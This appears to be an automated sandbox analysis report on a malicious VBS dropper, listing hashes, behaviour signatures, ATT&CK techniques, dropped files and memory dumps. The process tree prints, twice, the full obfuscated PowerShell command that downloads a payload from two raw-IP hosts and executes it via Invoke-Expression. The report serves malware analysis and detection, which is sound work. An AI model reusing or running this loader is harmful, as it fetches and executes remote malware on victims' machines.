Analysis

  • max time kernel
    157s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-06-2024 02:48

General

  • Target

    028a85e18dd99a848c0effc35a2dfca733965b21ee7f493774f2b942a1be1c72.vbs

  • Size

    186KB

  • MD5

    8378482dfb00608563257af10d70c96d

  • SHA1

    493b67c86ea9ca8ecb60f0388356ff0b8c1b5f40

  • SHA256

    028a85e18dd99a848c0effc35a2dfca733965b21ee7f493774f2b942a1be1c72

  • SHA512

    b31c395abe57132700c6056de274dbfa92fc105d0e35c73618ec004f0639acbd3411b252374ea4a14a805cb5e4dfd817e7ca7f9096a4931f22a060e7938ec3a7

  • SSDEEP

    3072:BmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZz:B08GxbKja3+DCbKCvBB/WnHXC/sLJFJ2

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\028a85e18dd99a848c0effc35a2dfca733965b21ee7f493774f2b942a1be1c72.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3604
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Hardness Outbuzz Trinflgerne Forbindelsesofficers Befordringsmidlets Riposterende Ggegule Ansvarsfulderes Sindsoprrtes Cledge Parkeringslygters Tangsnarre Subgranularity Prjudicere Kompasser Communicatory Preadapt Narvside Unexceptionality Lovkataloger Hydrografer Lsehoveds Preshrink Dramaturgist';$Friturekogerens = 1;Function Fradmmtes($Ankles){$Pantstningerne=$Ankles.Length-$Friturekogerens;$Afskning='SUBSTRIN';$Afskning+='G';For( $Svrhedsgrads=1;$Svrhedsgrads -lt $Pantstningerne;$Svrhedsgrads+=2){$Hardness+=$Ankles.$Afskning.Invoke( $Svrhedsgrads, $Friturekogerens);}$Hardness;}function Dactyliographer($Sinuates){ & ($Bortfrsler) ($Sinuates);}$Pseudoinspirational=Fradmmtes 'PMFo zAi l,lGa /F5D.I0. ,( W iRn dDoCw s N,TC 1 0,.P0P;G WGibnA6,4 ;S x,6L4P;U GrUvK: 1 2 1F. 0,) GCeTc kBoF/ 2 0,1s0.0I1 0.1, HF.i rLeOf,o x /,1 2 1..E0H ';$Unbaptizes=Fradmmtes 'MU sHeWr,-LASg e.n t. ';$Befordringsmidlets=Fradmmtes 'Hh t.t pB:K/ / 1O9P4,.P5.9 .F3,1 . 1C3 7K/IWVa,tGtmeBs,t..Fp f bT>,hBt tAp : /p/,9 4 .I1 5R6H.,8,.S8C8 / Wca.t.tMeFs t ..pAfwbc ';$Multiferous=Fradmmtes 'B>r ';$Bortfrsler=Fradmmtes 'HiMe xJ ';$Alanyl='Ansvarsfulderes';$faraoens = Fradmmtes ',eFc h oA %Sahp pBdLaLtRaE%G\ T.v,a.nSgDs a rTbTe,jCdDeT.FAVf vB &K& geKc,h.oI KtS ';Dactyliographer (Fradmmtes 'H$Sg l oGbPaRl :CC yRc l.oRgArBa pPhC=E(FcMmHdS M/ c. G$RfCa,rUa oSernUsH)a ');Dactyliographer (Fradmmtes ' $,gSlRoOb aVlI:NF.oPrJbHi n dMeAl sAe s oCf f iUc eBr sR=E$ B eVfIoSrHdPr.iPnIg,sSmAi.dKl e.tHs..SsSp lui.t (.$FM,u l t iNf e rPo uSsI) ');Dactyliographer (Fradmmtes ' [ N.eTtV.,S.eGrSvSi c,eCPDoGi.n.tTM.a.nBaAg e,r.]i:C: S,e cTuIr,i,t.y PSr.o,t.ofcJoSlw = .[oN eAtM.FSSeMcVuTrsiMt.yTPArAoFt o c o,lRToy p eT]A:P: TGl sS1T2S ');$Befordringsmidlets=$Forbindelsesofficers[0];$Suevi= (Fradmmtes ',$TgClSo bNa.l : gJo uBrOdFhre.aOd =UN e,w -,O bcjWe,c,t, iSPy sStAeSm..TNAe,t..RWAe bJC.l.iCeRnUt');$Suevi+=$Cyclograph[1];Dactyliographer ($Suevi);Dactyliographer (Fradmmtes 'G$AgHo uCrDd hEe aSdV.PH ePa d,e,rEsH[.$NUTn b aPptt,iPzHeKs ]G=U$FPSs ebuEdUo,i,nJs pTiZrAaot i.oKnLaDlH ');$Cicisbeo=Fradmmtes 'k$Kg.o.u rDd h e.aGd ..Dso w,nslOoFaFdPF i.lbeI(R$ BGe f,o rod r.i.nMg s mFi.dSl.e tSsS,R$ L s,e h o.v e d sC) ';$Lsehoveds=$Cyclograph[0];Dactyliographer (Fradmmtes 'C$ g lGo b aTl.:.V iKlml a eAn s,=T(iT eEsHtS- Pma tNhC $.LFsLe,hWoBvRe dLs ), ');while (!$Villaens) {Dactyliographer (Fradmmtes 'p$Fg l,o bMa lA:SS dUsBu pApFeSr sA=.$ht.r,uDen ') ;Dactyliographer $Cicisbeo;Dactyliographer (Fradmmtes '.SAt aPr tM-.S lKe e,p R4R ');Dactyliographer (Fradmmtes 'F$,g.lVoSbPaDl,: VPi l lRa e.n so=n( T e,sWtF-.P.aTtGh, .$ L s e h oavSeTd,sD)S ') ;Dactyliographer (Fradmmtes 'B$ gTl oOb a l.:BT r i.n f l g e rSnseN= $ gSl oBb aFlU:TOauRt b,uFz.zT+.+ % $.F oDrGb,iHnSd e.l s eBscoAfFf i cSerrFs,.ScTo,u,n tB ') ;$Befordringsmidlets=$Forbindelsesofficers[$Trinflgerne];}$Albumen=332897;$Gerontal=26524;Dactyliographer (Fradmmtes ' $Og lPopbTa l :ISMiBn d.s oSpSr rKt.eAsK N=, TG.eEtM-MC o.nRtDeEnCt A$SLUsDe.h oSvAe d sC ');Dactyliographer (Fradmmtes '.$ gOlAoSbSa l.: n y.hva vMn. ,=P F[SSDyIsftTeCmR.,COo.n,vVe r.t ]P:S:.FSr.o,m B aUs eP6 4RS tOr i nfg.(E$ S iHnfdSs o.p rtr,tDe s.)H ');Dactyliographer (Fradmmtes 'S$AgMl.o bHaIl,:ST,a.n gIsBn,a r,r.eG =A ,[lS y.sDtPe m,. T ePx t .sE.nRc o,dRi.n gs].:G:AASS,C IRIr.SG.e tES tGr,iEnEgS(.$ nSy,hCa vPnD) ');Dactyliographer (Fradmmtes ' $ gSl o bCa,lG:PFTeFsCtNmRisd d a g eRn.e s =.$ TOa nOgms n,aMrSrVeC.RsSuBb.sTtOr i n.gf(i$ ABlDb u m e,n , $ GHeprNo nEtFaIl.)N ');Dactyliographer $Festmiddagenes;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2572
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tvangsarbejde.Afv && echo t"
        3⤵
          PID:2924
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Hardness Outbuzz Trinflgerne Forbindelsesofficers Befordringsmidlets Riposterende Ggegule Ansvarsfulderes Sindsoprrtes Cledge Parkeringslygters Tangsnarre Subgranularity Prjudicere Kompasser Communicatory Preadapt Narvside Unexceptionality Lovkataloger Hydrografer Lsehoveds Preshrink Dramaturgist';$Friturekogerens = 1;Function Fradmmtes($Ankles){$Pantstningerne=$Ankles.Length-$Friturekogerens;$Afskning='SUBSTRIN';$Afskning+='G';For( $Svrhedsgrads=1;$Svrhedsgrads -lt $Pantstningerne;$Svrhedsgrads+=2){$Hardness+=$Ankles.$Afskning.Invoke( $Svrhedsgrads, $Friturekogerens);}$Hardness;}function Dactyliographer($Sinuates){ & ($Bortfrsler) ($Sinuates);}$Pseudoinspirational=Fradmmtes 'PMFo zAi l,lGa /F5D.I0. ,( W iRn dDoCw s N,TC 1 0,.P0P;G WGibnA6,4 ;S x,6L4P;U GrUvK: 1 2 1F. 0,) GCeTc kBoF/ 2 0,1s0.0I1 0.1, HF.i rLeOf,o x /,1 2 1..E0H ';$Unbaptizes=Fradmmtes 'MU sHeWr,-LASg e.n t. ';$Befordringsmidlets=Fradmmtes 'Hh t.t pB:K/ / 1O9P4,.P5.9 .F3,1 . 1C3 7K/IWVa,tGtmeBs,t..Fp f bT>,hBt tAp : /p/,9 4 .I1 5R6H.,8,.S8C8 / Wca.t.tMeFs t ..pAfwbc ';$Multiferous=Fradmmtes 'B>r ';$Bortfrsler=Fradmmtes 'HiMe xJ ';$Alanyl='Ansvarsfulderes';$faraoens = Fradmmtes ',eFc h oA %Sahp pBdLaLtRaE%G\ T.v,a.nSgDs a rTbTe,jCdDeT.FAVf vB &K& geKc,h.oI KtS ';Dactyliographer (Fradmmtes 'H$Sg l oGbPaRl :CC yRc l.oRgArBa pPhC=E(FcMmHdS M/ c. G$RfCa,rUa oSernUsH)a ');Dactyliographer (Fradmmtes ' $,gSlRoOb aVlI:NF.oPrJbHi n dMeAl sAe s oCf f iUc eBr sR=E$ B eVfIoSrHdPr.iPnIg,sSmAi.dKl e.tHs..SsSp lui.t (.$FM,u l t iNf e rPo uSsI) ');Dactyliographer (Fradmmtes ' [ N.eTtV.,S.eGrSvSi c,eCPDoGi.n.tTM.a.nBaAg e,r.]i:C: S,e cTuIr,i,t.y PSr.o,t.ofcJoSlw = .[oN eAtM.FSSeMcVuTrsiMt.yTPArAoFt o c o,lRToy p eT]A:P: TGl sS1T2S ');$Befordringsmidlets=$Forbindelsesofficers[0];$Suevi= (Fradmmtes ',$TgClSo bNa.l : gJo uBrOdFhre.aOd =UN e,w -,O bcjWe,c,t, iSPy sStAeSm..TNAe,t..RWAe bJC.l.iCeRnUt');$Suevi+=$Cyclograph[1];Dactyliographer ($Suevi);Dactyliographer (Fradmmtes 'G$AgHo uCrDd hEe aSdV.PH ePa d,e,rEsH[.$NUTn b aPptt,iPzHeKs ]G=U$FPSs ebuEdUo,i,nJs pTiZrAaot i.oKnLaDlH ');$Cicisbeo=Fradmmtes 'k$Kg.o.u rDd h e.aGd ..Dso w,nslOoFaFdPF i.lbeI(R$ BGe f,o rod r.i.nMg s mFi.dSl.e tSsS,R$ L s,e h o.v e d sC) ';$Lsehoveds=$Cyclograph[0];Dactyliographer (Fradmmtes 'C$ g lGo b aTl.:.V iKlml a eAn s,=T(iT eEsHtS- Pma tNhC $.LFsLe,hWoBvRe dLs ), ');while (!$Villaens) {Dactyliographer (Fradmmtes 'p$Fg l,o bMa lA:SS dUsBu pApFeSr sA=.$ht.r,uDen ') ;Dactyliographer $Cicisbeo;Dactyliographer (Fradmmtes '.SAt aPr tM-.S lKe e,p R4R ');Dactyliographer (Fradmmtes 'F$,g.lVoSbPaDl,: VPi l lRa e.n so=n( T e,sWtF-.P.aTtGh, .$ L s e h oavSeTd,sD)S ') ;Dactyliographer (Fradmmtes 'B$ gTl oOb a l.:BT r i.n f l g e rSnseN= $ gSl oBb aFlU:TOauRt b,uFz.zT+.+ % $.F oDrGb,iHnSd e.l s eBscoAfFf i cSerrFs,.ScTo,u,n tB ') ;$Befordringsmidlets=$Forbindelsesofficers[$Trinflgerne];}$Albumen=332897;$Gerontal=26524;Dactyliographer (Fradmmtes ' $Og lPopbTa l :ISMiBn d.s oSpSr rKt.eAsK N=, TG.eEtM-MC o.nRtDeEnCt A$SLUsDe.h oSvAe d sC ');Dactyliographer (Fradmmtes '.$ gOlAoSbSa l.: n y.hva vMn. ,=P F[SSDyIsftTeCmR.,COo.n,vVe r.t ]P:S:.FSr.o,m B aUs eP6 4RS tOr i nfg.(E$ S iHnfdSs o.p rtr,tDe s.)H ');Dactyliographer (Fradmmtes 'S$AgMl.o bHaIl,:ST,a.n gIsBn,a r,r.eG =A ,[lS y.sDtPe m,. T ePx t .sE.nRc o,dRi.n gs].:G:AASS,C IRIr.SG.e tES tGr,iEnEgS(.$ nSy,hCa vPnD) ');Dactyliographer (Fradmmtes ' $ gSl o bCa,lG:PFTeFsCtNmRisd d a g eRn.e s =.$ TOa nOgms n,aMrSrVeC.RsSuBb.sTtOr i n.gf(i$ ABlDb u m e,n , $ GHeprNo nEtFaIl.)N ');Dactyliographer $Festmiddagenes;"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3456
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tvangsarbejde.Afv && echo t"
            4⤵
              PID:1068
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4112 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:224

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4smndswl.aax.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Tvangsarbejde.Afv
          Filesize

          467KB

          MD5

          ebc603f013333acdb9edeeec3419d49d

          SHA1

          d2ae4118a93874422ffa464dc225e7da16483a91

          SHA256

          d56548cb4c363a5243f55e8602b2f45050cdcc89fae1dbe79f38488a4cac509b

          SHA512

          ec13e53881778cda945c180452d8ab49b90068f136462b3c0e31789dc9306b178e4ade472f5ebcadbc420405773a0a303bb92bec16b666114c2e5b21e94967d1

        • memory/2572-4-0x00007FFE93643000-0x00007FFE93645000-memory.dmp
          Filesize

          8KB

        • memory/2572-5-0x000001FA57B90000-0x000001FA57BB2000-memory.dmp
          Filesize

          136KB

        • memory/2572-15-0x00007FFE93640000-0x00007FFE94101000-memory.dmp
          Filesize

          10.8MB

        • memory/2572-16-0x00007FFE93640000-0x00007FFE94101000-memory.dmp
          Filesize

          10.8MB

        • memory/2572-17-0x00007FFE93640000-0x00007FFE94101000-memory.dmp
          Filesize

          10.8MB

        • memory/2572-18-0x00007FFE93643000-0x00007FFE93645000-memory.dmp
          Filesize

          8KB

        • memory/2572-19-0x00007FFE93640000-0x00007FFE94101000-memory.dmp
          Filesize

          10.8MB

        • memory/3456-24-0x0000000004D70000-0x0000000004D92000-memory.dmp
          Filesize

          136KB

        • memory/3456-23-0x0000000005350000-0x0000000005978000-memory.dmp
          Filesize

          6.2MB

        • memory/3456-25-0x0000000005180000-0x00000000051E6000-memory.dmp
          Filesize

          408KB

        • memory/3456-26-0x0000000005260000-0x00000000052C6000-memory.dmp
          Filesize

          408KB

        • memory/3456-32-0x0000000005980000-0x0000000005CD4000-memory.dmp
          Filesize

          3.3MB

        • memory/3456-37-0x0000000005E90000-0x0000000005EAE000-memory.dmp
          Filesize

          120KB

        • memory/3456-38-0x00000000060B0000-0x00000000060FC000-memory.dmp
          Filesize

          304KB

        • memory/3456-39-0x00000000079D0000-0x000000000804A000-memory.dmp
          Filesize

          6.5MB

        • memory/3456-40-0x00000000065B0000-0x00000000065CA000-memory.dmp
          Filesize

          104KB

        • memory/3456-41-0x00000000073F0000-0x0000000007486000-memory.dmp
          Filesize

          600KB

        • memory/3456-42-0x0000000006700000-0x0000000006722000-memory.dmp
          Filesize

          136KB

        • memory/3456-43-0x0000000008600000-0x0000000008BA4000-memory.dmp
          Filesize

          5.6MB

        • memory/3456-22-0x00000000026A0000-0x00000000026D6000-memory.dmp
          Filesize

          216KB